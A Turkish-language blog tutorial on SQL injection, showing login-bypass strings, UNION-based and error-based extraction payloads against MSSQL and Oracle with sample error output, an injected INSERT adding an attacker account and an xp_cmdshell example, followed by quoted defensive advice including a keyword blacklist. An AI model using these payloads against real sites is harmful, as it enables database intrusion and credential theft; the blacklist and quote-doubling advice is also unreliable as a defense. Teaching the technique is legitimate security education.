Bu Açıklar Web Uygulamalarındaki Kodlama Hataları Sonucu Oluşmaktadır. Zararlı Karakterlerin Filtrelenmemesi, Değişkenlerin Yanlış Atanması, Webmaster Üşengeçliği vs.

3. Açığı Basitçe Exploit Etmek
Arama Formlarında Genellikle Form'dan Girilen Değerler Database'de SQL Sorguları Yardımıyla Karşılaştırılarak Benzerleri veya Aynıları Sayfaya HTML Görünümlü Olarak Yansıtılır. Bu Arama Kutusunu Kullanarak Database'de Kitapları ZeroTolerance Yazarına Göre Arayacak Sorgu ;

Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance';

Bu Sorgu Database'in Kitaplar Tablosundan adi,yazar,fiyat Kolonlarına Göre Listeleme Yapıyor. Fakat Where Koşulu İle Yazarın ZeroTolerance Olması İsteniliyor. Dolayısıyla Sayfada Yazarının ZeroTolerance Olduğu Kitaplar Adı ve Fiyatına Göre Yansıtılır. Saldırgan Kodlama Hatasından Faydalanarak Sorguyu Manipule Edebilir ve Veritabanı Yanıtlarını Kendi Lehine Çevirebilir. Saldırgan Sorguya ‘ Meta Karakterini ve Herhangi Bir String Ekleyerek Sorguya Müdahale Eder.

Select adi,yazar,fiyat From kitaplar where yazar='O'ZeroTolerance';

Sorguda Sadece O 'ya Göre Veriler Alınıyor ZeroTolerance İse Sorgu Dışıdır Çünkü ‘ dan sonraki Komutları Kapsüllenmemiş Olarak Algılar. SQL ZeroTolerance'ı Kendi Yapısında Bulundurmadığı İçin Geçersiz Söz Dizimi Hatası Verecektir.

Incorrect syntax near ‘ZeroTolerance’.
Page.asp , Line 115
Unclosed quotation mark before the character string ‘

Saldırgan İstediği Hatayı Aldıktan Sonra Sorguyu Manipule Ettiğini Anlayacaktır ve Saldırısına Devam Edecektir. ' OR 1=1-- İle Devam Eder;

Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance 'OR 1=1--';

Manipule Edilmiş (Düzenlenmiş) Sorgu Database'de True Dönecektir Çünkü 1 Her Zaman 1 e Eşittir ve Database'de Kitaplar Tablosundaki Bütün Verileri Sayfada Yansıtacaktır. (Buradaki Or veya Anlamında Kullanılmaktadır veya 1=1)

• Login Bypassing
Birçok Web Uygulaması Kullanıcı Kimlik Bilgilerini Depolamak, Oturum Açma Teşebbüsünü Doğrulamak İçin Basit SQL Sorguları Kullanırlar. Bu SQL Sorgular İcra Ettikleri Veritabanı Üzerinde Oturum Açma İşlemini Formlar Aracılığıyla Yapar.Bu Sorguya Örnek ;

Select * From kullanicilar where kulladi=’zero’ and sifre =’tolerance’

Buradaki kulladi ve sifre Kolonlarında (Sırasıyla) zero ve tolerance Değerleri Varsa ve Aynı Karşılıklı Değerlerle Eşleşiyorsa Oturum Açma İşlemi Başarılıdır. Saldırgan Sorguyu Enjekte Etmek İçin Hem Kullanıcı Adı Hem de Şifre Form’larından Faydalanabilir. Eğer Saldırgan Kullanıcı Adının Admin Olduğunu Biliyorsa; Şifresiz Giriş Yapmaya Çalışacaktır. Giriş İçin Kullanıcı Adı Formuna admin’-- Eklemesi Yeterlidir.

Select * from kullanicilar where kulladi =’admin’--‘ and sifre=’foo’

SQL Dili -- ‘den Sonraki Komutları Comment (Yorum) Satırı Olarak Algılamaktadır. Dolayısıyla SQL Cümlesi Aşağıdaki Gibi Değişecektir.

Select * From kullanicilar where kulladi =’admin’

Saldırgan Admin Kullanıcı Adıyla “Şifresiz” Giriş Yapacaktır. (Burada Şifre Sorgulama Sorgusu Bypass Edilmiştir.)

Fakat Saldırgan Veritabanındaki Kullanıcı Adı veya Adlarını Her Zaman Bilemez. Veritabanlarındaki İlk Kullanıcı Genelde En Üst Düzey Kullanıcıdır (Administrator, Root) Çünkü Bu Kullanıcı Elle Eklenmiş ve Uygulama Üzerinde Diğer Tüm Kullanıcılara Erişme Yetkisi Vardır. Şayet Sorgu Birden Fazla Kullanıcı Detaylarını Gösteriyorsa (ki Birçok Uygulamada Bu Vardır) Saldırgan Kullanıcı Bilgilerine (Özellikle Üst Yetkili Kullanıcılara) Ulaşmak İçin Açığı Farklı Bir Şekilde Exploit Etmeye Çalışacaktır. Daha Öncede Bahsettiğim Gibi ‘ OR 1=1-- Bu İşlem İçin Uygundur. (Bu Çoğaltılabilir ‘ OR ‘1’=’1’, ‘ OR ‘a’=’a’ ………)

Select * From kullanicilar where kulladi=’’ OR 1=1--‘ and sifre=’foo’ | Sorgu -- ‘den Sonraki Cümleleri Yorum Satırı Olarak Kabul Edecektir ve Sorgu Veritabanına;

Select * From kullanicilar where kulladi=’’ OR 1=1 Şeklinde Gönderilecektir.( ‘ OR 1=1 Kerametini Önceden Açıklamıştım.) Uygulama Bütün Kullanıcı Adlarını Sayfada Gösterecektir.

4. SQL Injection Açığı Bulmak
SQL Injection Açıklarının Kodlama Hatalarından Meydana Geldiğini Söylemiştim. SQL Dilinde Veriler Genellikle İki Farklı Şekildedir. String (Dizi) ve Numerik Veri.

• String Veri
String Veriler Sorguya Dahil Edildiklerinde ( ‘veri’ ) Tek Tırnak İşaretleri Arasına Alınarak Kapsüllenir. SQL Atağı Yapılırken Tırnaklar Dışarı Atılarak ( ‘ OR 1=1-- ) Sorgu Manipule Edilir.
• Numerik (Sayısal) Veri
Genellikle Sayısal Veriler Sorguya Dahil Edildiklerinde Herhangi Bir Kapsülleme (Özel Karakter) Kullanılmaz. Sayısal Veriler Veritabanıyla Doğrudan İlişkilidir Sorguya Direk Dahil Edilirler ve Sorgularda Integer, Numeric, Logint Veri Tipli Kolonlardan Bilgi Alınır.

Select id from kitaplar where id=1 | id’si 1 Olan Kitap Veritabanından Alındı.

Numerik Verileri Exploit Etmek String’e Göre Zordur Fakat Çeşitli Yöntemleri Vardır. Bu Yöntemlerden Daha Sonra Bahsedeceğiz.

4. SQL’de Bazı İfadeler ve Kullanımları
• SELECT İfadesi
Veritabanından Veri Seçme İfadesidir. Kullanım Örnekleri Aşağıdaki Gibidir.

SELECT "kolon1" ,"kolon2" from "tabloadı" where "şart";
(Kolon Adları Belirtmeden Bütün Kolonlar İçin “*” Kullanılır)
Where Koşulu İçin Gerekli İfadeler
= Eşit
> Büyük
< Küçük
>= Büyük veya eşit
<= Küçük veya eşit
<> Eşit değil
LIKE Benzer, içeren

Select adi, Fiyat From Kitaplar
Where yazar LIKE 'Z%';

Select adi From Kitaplar
where fiyat LIKE '40';

Select adi, Fiyat From Kitaplar
where yazar LIKE 'Z%';

• INSERT İfadesi
Veritabanına (Tabloya) Yeni Veri Ekleme İfadesidir. Kullanım Örnekleri Aşağıdaki Gibidir.
Insert Into Tablo Adı (kolon1,kolon2,kolon3) Values (‘değer1’,’değer2’,’değer3’)
Insert Into Kitaplar (adi,fiyat,yazar) Values (‘SQL’,’100’,’ZeroTolerance’) // SQL Adında 100 Lira Değerinde Yazarı ZeroTolerance Olan Kitap Ekler.
• UPDATE İfadesi
Veritabanında (Tabloda) Bulunan Verileri Değiştirmeyi Sağlayan İfadedir.
Update Tabloadı Set Kolonadı =’YeniDeğer’
Where “Şart”;
Update Kitaplar Set Yazar=’Zero’
Where fiyat=’100’; // Fiyatı 100 Olan Kitapların Yazarını Zero Yapar.
• DELETE İfadesi
Veritabanında (Tabloda) Var olan Kayıtları Silmeyi Sağlayan İfadedir.
Delete From Tabloadi where şart
Delete From Kitaplar where yazar=’ZeroTolerance’ Yazarı ZeroTolerance Olan Kitapları Siler.

5. SQL Injection Tipleri
• URL Injection
Injection Saldırısı Direk URL Üzerinden Yapılır. Numerik Verilerde Database’den Sayısal Değer Çekiliyorsa Sorguda Özel Karakterler Kullanılmaz. Örneğin ;
http://kurban.com/default.asp?id=1
Saldırgan 1’den Sonra ‘ (Tırnak> Shift + 2) İşaretini Eklediği Zaman Sorgu Değişecek ve Uygulama Hata Verecektir.
• Form Injection
Form Injection’lar Genellikle Login Bypassing Başlığında Yazıldığı Gibidir. Fakat Daha Sonraki Bölümlerde URL Injection’la Birlikte Form Injection’dada Uygulanabilecek Saldırı Tiplerini İnceleyeceğiz.

• Blind Injection
Sayfada Injection Açığı Var Fakat Hata Vermiyorsa veya Coder Tarafından Yönlendirilmiş Sayfaya Gidiyorsa Uygulamada Blind SQL Injection Açığı Vardır. ASCII, Substring (Oracle’da substr) Fonksiyonları Kullanılarak Database’den Veriler Çekilir.

6. UNION Operatörü
Union Operatörü İki Tablodan Aynı Anda Veri Çekme İşleminde Kullanılır.

İki Tablomuz Var Kitaplar ve Kullanıcılar Adında.
Kitaplar (ID,Baslik,Yazar, Detay, Fiyat)
Kullanicilar (ID, KullAdi, Sifre, Email)

Baslik Kolonunun İçindeki Veriler ;
Dijital Kale
Aldatma Sanatı
Büyük Umutlar

Username Kolonunun İçindeki Veriler ;
Admin
ZeroTolerance

Normalde

Select Baslik From Kitaplar Sorgusu Yazıldığı Zaman Veritabanı ;
Dijital Kale
Aldatma Sanatı
Büyük Umutlar

Verilerini Gösterecektir. Aynısı Kullanicilar Tablosu İçinde Geçerlidir

Select KullAdi From Kullanicilar;
Admin
ZeroTolerance

Fakat;

Select Baslik From Kitaplar Union Select KullAdi From Kullanicilar;

Sorgusu Veritabanına Gönderildiğinde Veritabanı Hem Kitaplar Tablosunun Baslik Kolonundaki Verileri Hem de Kullanicilar Tablosundaki KullAdi Verilerini Gösterecektir.

Dijital Kale
Aldatma Sanatı
Büyük Umutlar
Admin
ZeroTolerance

Üstteki Örnekle Union’ın Temel Olarak Ne İşe Yaradığı Anlatıldı. Fakat Saldırgan Union Komutunu Nasıl Kullanabilir ?

Daha Önceden Açığı Basitçe Exploit Etmek Başlığı Altında

Select adi,yazar,fiyat From kitaplar where yazar='ZeroTolerance'; Sorgusundan Bahsetmiştik. Saldırgan İkinci Sorgusunu Göndermek İçin Union Komutunu Kullanacaktır. Ve

ZeroTolerance ‘ Union Select KullAdi,Sifre From Kullanicilar—

Bu Sorguyla Veritabanı Kullanicilar Tablosundan Kulladi ve Sifre Kolonlarındaki Verileri Getirecektir.

Eğer Orijinal Sorguda Üç Kolon Var ve Enjekte Edilen Sorguda İki Kolon Varsa Veritabanı Alttaki Gibi Bir Hata Döndürecektir.

query block has incorrect number of result columns

veya
The number of columns in the two selected tables or queries of a union query do not match.

Burada Saldırgan Kolon Sayısını Tutturmayı Deneyecektir. Bunun İçin Eğer Diğer Kolon Adlarını Biliyorsa Kolon Adını

ZeroTolerance ‘ Union Select ID,KullAdi,Sifre From Kullanicilar

Sorgusuyla Eşitleyip Cevabın True Dönmesini Sağlayacaktır. Şöyle Bir Durum Var ki Kolon Veri Tipleri Aynı Değilse Veritabanı Hata Verir. Genellikle ID Kolonu Sayısal Değerlere Sahiptir (1,100,1000 vs.) KullAdi ve Sifre Kolonları İse String Yapıya Sahiptir Sorguda Integer ve String Veriler Aynı Sorguya Alındıkları İçin Integer Veriler String Veriye Dönüştürülemeyeceğinden Veritabanı Aşağıdaki Gibi Hata Verecektir.

expression must have same datatype as corresponding expression

* Eğer Kolon Adları Bilinmiyorsa Saldırgan Kolon Adlarını Eşitlemek İçin Null (Boş) İfadeler Kullanırl

ZeroTolerance ‘ Union Select null,null,null from Kullanicilar (0,1,2,3,4 Gibi Sayısal Verilerde Olabilir)

Bu Null Verilere Kullanılan Veritabanına Göre Çeşitli Değişkenler Yazılır @@version Gibi. MSSQL Server’larda @@version Değişkeni Server Versiyonunu (Bilgiler) Göstermektedir. Öyleyse Saldırgan Veritabanı Versiyonunu Öğrenmek İçin ;

ZeroTolerance ‘ Union Select @@version,null,null From Kullanicilar Sorgusuyla Database Versiyonunu Öğrenebilir.

7. ODBC Hatalarından Faydalanarak Açığı Exploit Etmek (Sadece MSSQL)

Eğer Saldırgan MSSQL Server Üzerindeki Veritabanına Saldırıyorsa ODBC Hataları Saldırgan İçin Çok Önemli Bir Avantajdır. ODBC Hatalarını Kullanarak Gerek Veritabanına Gerekse Diğer Veritabanlarına Ait Bilgileri ODBC Rahatça Ele Geçirebilir.

• Tablo ve Kolonları Öğrenmek
Login Bypassing Başlığı Altında Saldırganın Oturum Açma Panellerini Nasıl Şifresiz Geçtiğini Görmüştük. Şimdi İse Saldırganın Yine Aynı Panelleri Kullanarak Özel Bilgilere Nasıl Erişebildiğini İnceleyelim.

Kullanicilar Tablosu;
ID(Int)
KullAdi(VarChar)
Sifre(VarChar)
Email(VarChar)

Select * From kullanicilar where kulladi=’zero’ and sifre =’tolerance’

Eğer ODBC Hataları Tarayıcıda Gösteriliyorsa Saldırgan Bu Hatalardan Yararlanarak Injection Açığını Bilgileri Almak Amacıyla Exploit Edecektir.

‘ having 1=1--

Dönecek Hata Mesajı ;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Kullanicilar.ID’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.

Buradan Saldırgan Bir Kullanicilar Tablosunun Var Olduğunu ve Bu Tabloya Ait İlk Kolonun ID Olduğunu Öğrenmiştir. Sonraki Aşama Saldırı Sorgusuna Teker Teker Bulduğu Kolon İsimlerini Eklemektir.

‘ group by kullanicilar.id having 1=1—

Dönecek Hata Mesajı ;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Kullanicilar.Kulladi’
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.

Burada Saldırgan İkinci Kolonun KullAdi Olduğunu Öğrenmiştir. Saldırı Sorgusuna Bulduğu İkinci , Üçüncü, Dördüncü (Bulduğu Kadar) Kolonuda Ekleyerek İşlem Yapılan Bütün Kolonları Bulur.

‘ group by kullanicilar.id, kullanicilar.kulladi, kullanicilar.sifre, kullanicilar.email having 1=1-- (Bütün Kolonlar)

Bütün Kolonları Bulunca Herhangi Bir Hata Mesajı Döndürülmeyecektir.

Sonraki Aşama Bütün Kolonların Veri Türlerini Belirlemektir.

‘ Union Select sum(kulladi) From Kullanicilar

Bu Sorgu KullAdi Kolonundaki Verileri Birleştirir ve Aşağıdaki Gibi Bir Hata Verdirir. (SUM > Toplama Fonksiyonu)

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.

Saldırgan Burada KullAdi Kolonunun String Veri Türlü ve VarChar Veri Tipli Olduğu Anlar. Çünkü Sum Fonksiyonu Sayısal Değerleri Topladığı İçin String Değerlerde Hata Verecektir.

Saldırgan Veri Tiplerini Öğrenmeye Devam Eder Çünkü Amacına Yeterince Ulaşmamıştır Yine Sum Fonksiyonunu Kullanarak ;

‘ Union Select Sum(ID) From Kullanicilar

Bu Sorgu Veritabanına Gönderildiği Zaman Şöyle Bir Hata Mesajı Döner ;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.

Saldırgan Sum Fonksiyonunun Başarıyla İşlem Yaptığını, Fakat Döndürülen Hatada Veri Tabanında 4 Kolon Olduğunu Gönderilen Sorguda Tek Kolon Olduğunu Söyler. Bu Saldırganı Pek İrdelemez Çünkü ID Kolonunun Numerik Veri Tipli Olduğunu Anlamıştır. (Sum Fonksiyonu Başarıyla Çalıştı).

Bu İşlem Bütün Kolon Veri Tiplerini Öğrenene Kadar Devam Ettirilir. Saldırgan Bütün Veri Tiplerini Öğrendikten Sonra Veritabanına Hükmedebilir. Yeni Veri Ekleyebilir, Güncelleştirebilir, Silebilir………

Saldırganın Tabloya Yeni Veri Ekleyeceğini Varsayalım.

‘; Insert Into Kullanicilar Values (‘999’,’Saldirgan’,’passwd’,’saldirgan@mail.com’)—

Bu Sorguyla Veritabanına 999 Numaralı, Saldırgan Nickli, passwd Şifreli ve Maili saldirgan@mail.com Bilgileriyle Yeni Kullanıcı Eklendi.

• İşe Yarayan Bilgileri Almak (Veri Çekmek)
Saldırgan Veritabanında Var Olan Verileri Çekmek İçin Veri Tiplerini Ters Gösteren Sorgular Yazar. Örneğin String Verileri Integer, Integer Verileri String Tiplerine Dönüştürerek Bu İşlemi Gerçekleştirebilir. SQL ‘de Convert Fonksiyonu Vardır. Bu Fonksiyon Veri Tiplerini Çevirmeyi Sağlar. Fakat Convert Fonksiyonuna Geçmeden Önce Farklı Bir Yöntem Deneyelim. (Var – Yok Olayı)
Saldırgan String Veri Tipli Bir Kolonun İçinde Integer Ararsa Server Hata Verir.

‘ OR 1 in (select @@version)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value ‘Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ‘
to a column of data type int.

Bu İşlem Sadece Server Versiyonu Almaktan İbaret Değildir.

‘ OR 1 in (select sifre from kullanicilar where kulladi=’admin’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘zerotolerance’ to a column of data type int.

Convert Fonksiyonuyla İse Mantık Aynı Fakat Kullanım Farklı. Genelde Numerik Verilere Uygulanan Injectionlarda Kullanılır.

1 and 1=convert(int,(select top 1 sifre from kullanicilar where kulladi=’admin’))--

Bu Sorgu İle ‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)-- arasında Fark Yoktur. Aynı Hata Döner.

• Kayıt İlerletme
Saldırganın Veritabanından Almak İstediği Bilgiler her Zaman İlk Veriler Olmayabilir. Bunu İçin Saldırgan Verileri (Kayıt) İlerleterek İstediği Bilgilere Ulaşmayı Dener. Saldırgan Önceki Veri Çekme Tekniğini Kullanarak Aynı İşlemi Yapabilir Fakat Kullandığı Sorguya Koşul Ekler. Koşulda İstediği Veri Tipini, Adını vs. Belirler.

‘ OR in (select min(kulladi) from kullanicilar where username > ‘a’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘admin’ to a column of data type int.

Saldırganın İstediği Kullanıcı Adı Admin Olmayabilir Dolayısıyla ;

‘ OR in (select min(kulladi) from kullanicilar where username > ‘admin’)—

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘ahmet’ to a column of data type int.

Saldırgan Bu şekilde Kayıtları İlerleterek (Farklı Yöntemlerde Var, Üretebilir) İstediği Verileri Alabilir.

8. Açığı Database Tiplerine Göre Exploit Etmek (MySQL, MSSQL, Oracle)

Her Veritabanı Farklı Yapıda Olduğu İçin Verilerin Depolandığı Tablolar, Tipler vs. Farklıdır.

• MSSQL
Bir Ürün Sayfasını Ele Alalım. Ürün İsmine Tıklandığı Zaman Ürünün ID’sine Göre Ürün Detayları Çağırılsın.

select * from urunler where id = "&id&"

Urunler Tablosu Kolonları ;
ID
Ad
Detay

URL ; http://kurban.com/urun.asp?id=1

Sonuçlar ;
AirTies RT 105 ADSL Modem | Kablolu Modem

Saldırgan Union İle Sorgu Birleştirip Kolon Sayısını Eşitleyecektir.

http://kurban.com/urun.asp?id=1’ Union Select null--

Dönecek Hata ;

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.

Kolon Sayısının Eşleşmediğini Söylüyor. Yeni Boş (null) Değer Ekleyerek Saldırgan İşleme Devam Eder. Ta ki Kolon Sayısını Eşleştirene Kadar.

http://kurban.com/urun.asp?id=1’ Union Select null,null,null--

* Kolon Sayısı Eşleştiği Zaman Sayfa Olduğu Gibi Görünür.

Saldırgan Önceki İşlemlerde Olduğu Gibi MSSQL Server Tarafından Kullanılan Genel Değişkenleri Sayfada Yansıtmak İster. (@@version vs.)

Daha Sonra Saldırgan Veri Bulunan Tablo ve Kolon Adlarını sysobjects Tablosundan Çekmeye Çalışır. (sysobjects Tablosunda Veritabanı Ayrıntıları Bulunur.) Saldırgan Kendi Tanımlayacağı Bilgileri Almak İçin xtype=’U’ Parametresini Kullanır.

http://kurban.com/urun.asp?id=1’ Union Select null,name,null From sysobjects where xtype=’U’ --

Sayfa ;
AirTies RT 105 ADSL Modem | Kablolu Modem
Dtproperties
Kullanicilar
Urunler

Saldırgan Kullanicilar Tablosunu Bulmuştur. Kullanıcı Bilgilerini Almak İçin Kullanıcılar Tablosunun Kolonlarını Öğrenmek Zorundadır. Bunu syscolumns Tablosuna Sorgu Göndermeyi Deneyerek Başarmak İster.

http://kurban.com/urun.asp?id=1’ Union Select null,name,null From sysobjects,syscolumns where id=id and name=’Kullanicilar’--

Sayfa ;
AirTies RT 105 ADSL Modem | Kablolu Modem
ID
Email
KullAdi
Sifre

Saldırgan Amacına Ulaşmıştır. Tablo ve Kolon Bilgilerini Almıştır Geriye Kalan Tek Şey Aldığı Tablo ve Kolonlardan Bilgileri Çekmektir.

http://kurban.com/urun.asp?id=1’ Union Select null,kulladi,sifre from Kullanicilar--

Sayfa ;
AirTies RT 105 ADSL Modem | Kablolu Modem
Admin | admin
Ahmet | zeroo
ZeroTolerance | ztzt

Not : Tablo Tipleri Eşleşmelidir. Yukarıda Anlatıldı.

• Oracle
Oracle Injection’ları Exploit Etmek MSSQL Gibidir Fakat Sistem Tablo İsimleri Farklıdır. MSSQL Bölümündeki Sayfayı Tekrar Ele Alalım. (DB tipi Oracle!)

Saldırgan Yine Union Atağı Yaparak Kolon Sayısını Eşleştirmeye Çalışacaktır.

http://kurban.com/urun.asp?id=1’ Union Select null--

Eğer Kolon Sayısı Eşleşmediyse ;

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns

Hatasını Verecektir. Eşleştiyse MSSQL’deki Gibi Veriler Sayfada Gösterilecektir.

http://kurban.com/urun.asp?id=1’ Union Select null,null,null--

Sayfa ;
AirTies RT 105 ADSL Modem | Kablolu Modem

Saldırgan MSSQL’de Yaptığı Gibi Sayfada String Tipli Kolonları Arar. (Bunun İçin null Değerleri String Sorguları Gönderir.)

Örn :

http://kurban.com/urun.asp?id=1’ Union Select ‘a’,null,null --

Eğer 1. Kolon String Tipli Değilse Sayfa ;

[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as
corresponding expression

Hatasını Verir. String Tipliyse ;

Sayfa ;

AirTies RT 105 ADSL Modem | Kablolu Modem
a

Şeklinde Olur.

Saldırgan Kolon Tiplerinide Öğrendikten Sonra Sistem Tablolarından Erişmek İstediği Tablo ve Kolonları Çekmeye Çalışır. (User_objects Tablosu)

http://kurban.com/urun.asp?id=1’ Union Select null,object_name,object_type From user_objects--

Sayfa ;

AirTies RT 105 ADSL Modem | Kablolu ADSL Modem
GETEMP | PROCEDURE
Kullanicilar | TABLE
Urunler | TABLE
PK_Kullanicilar | INDEX

Saldırgan Aradığını Bulmuştur. “Kullanicilar”. Sıra Kolon İsimlerini Almaya Gelmiştir. Kolon İsimleri Oracle Veritabanlarında user_tab_columns Tablosunda Barınmaktadır.

http://kurban.com/urun.asp?id=1’ Union Select null,column_name,null From user_tab_columns where table_name=’Kullanicilar’--

Sayfa ;

AirTies RT 101 ADSL Modem | Kablolu ADSL Modem
ID
Email
KullAdi
Sifre

Saldırgan Bilgileri Aldıktan Sonra Bilgileri, Sorgu Göndererek Sayfada Yansıtmaya Çalışır.

http://kurban.com/urun.asp?id=1’ Union Select null,kulladi,sifre,null From Kullanicilar--

Sayfa ;

AirTies RT 105 ADSL Modem | Kablolu ADSL Modem
Admin | admin
Ahmet | zeroo
ZeroTolerance | ztzt

9. SQL Injection Güvenliği

Bu Kısım Alıntıdır. Çünkü Benim Söyleyeceklerimle Hemen Hemen Birebir Aynı.

Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".

3.1. Kullanıcı Haklarının Sınırlandırılması

Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.

Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.

3.2. Girdilerde Tırnak İmleçlerinin (’) Kötü Amaçlı Kullanımının Engellenmesi

Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (’) tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.

Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.

ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;

<%
Function ReplaceQuotes(strWords)
ReplaceQuotes = Replace(strWords,”’”,”””)
End Function
%>

Bu fonksiyonu baştaki örnekte kullanırsak;

SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’’ OR 1=1 --’

şeklinde olan deyim...

SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’" OR 1=1 --’

’e dönüşecektir.

3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi

SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.

Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;

<%
Function FilterBadWords(strWords)
dim BadWords
dim NewWords
BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_"’)
NewWords = strWords
for i = 0 to uBound(BadWords)
NewWords = Replace(NewWords, BadWords(i), ""’)
Next
FilterBadWords = NewWords
End Function
%>

Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;

SELECT Username FROM Users WHERE Usename=’’; EXEC master..xp_cmdshell ’dir c’; --’ AND Password=’’

Şeklindeki SQL Deyimi...

SELECT Username FROM Users WHERE Usename=’" EXEC master.. cmdshell "dir c:" ’ AND Password=’’

e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.

Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.

3.4. Girdi Uzunluğunun Sınırlandırılması

Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.

3.5. Girdi Cinsinin Kontrol Edilmesi

Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.

3.6. Girdi Cinsinin Kontrol Edilmesi

Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.

10. Referanslar

http://ferruh.mavituna.com Ferruh Mavituna
http://www.unixwiz.net/techtips/sql-injection.html SQL Injection Attacks By Example
http://www.securiteam.com/securityreviews/5DP0N1P76E.html SQL Injection Walkthrough
http://msdn.microsoft.com/en-us/library/ms161953.aspx SQL Injection (Microsoft)
http://www.owasp.org/index.php/SQL_Injection SQL Injection - Owasp
www.ngssoftware.com/papers/advanced_sql_injection.pdf Advanced SQL Injection

11. Bitiş
Sizlere SQL Injection’ın Ne Olduğu, Nelerden Kaynaklandığı, Açıkların Nasıl Sömürülebileceği ve Alınabilecek Önlemler Hakkında Bilgi Verildi.

Murat ŞEKER

Tekrar Blog Yazmaya Başladım

2009-06-12T10:54:00.001-07:00

Merhaba
Bende Bloglamaya Başladım. Kafama Estikçe Yazarım Artık :D